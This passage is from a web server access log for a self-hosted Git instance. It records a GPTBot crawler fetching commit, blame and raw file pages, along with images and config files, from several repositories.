+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12856] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" +[17/Feb/2026:14:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:14:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:14:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:14:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 10531] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:14:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=docker-compose.yml" [Client 74.7.227.38] [Length 18686] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:14:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11479] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9507] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10933] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:14:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:14:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" +[17/Feb/2026:14:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11105] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:14:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:14:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject" +[17/Feb/2026:14:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699390] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508445] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641784] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692338] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429933] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498818] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10767] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:14:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49516] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:14:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:14:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 57824] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:14:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 77674] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:14:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 400245] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:14:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" +[17/Feb/2026:14:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" +[17/Feb/2026:14:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" +[17/Feb/2026:14:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" +[17/Feb/2026:14:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" +[17/Feb/2026:14:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" +[17/Feb/2026:14:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" +[17/Feb/2026:14:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" 